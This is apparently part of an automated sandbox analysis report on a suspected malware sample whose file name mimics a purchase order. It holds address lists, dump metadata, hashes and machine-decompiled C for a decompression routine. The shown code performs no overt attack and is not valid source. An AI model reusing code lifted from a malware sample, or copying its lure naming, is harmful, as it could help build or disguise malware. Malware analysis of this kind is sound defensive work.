                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040696f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00406a71
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00406a21
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00406a71
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x0040682f
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000
                                                                                                                          0x00406bce
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a64

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                                                                                          • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                                                                                                                          • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                                                                                          • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
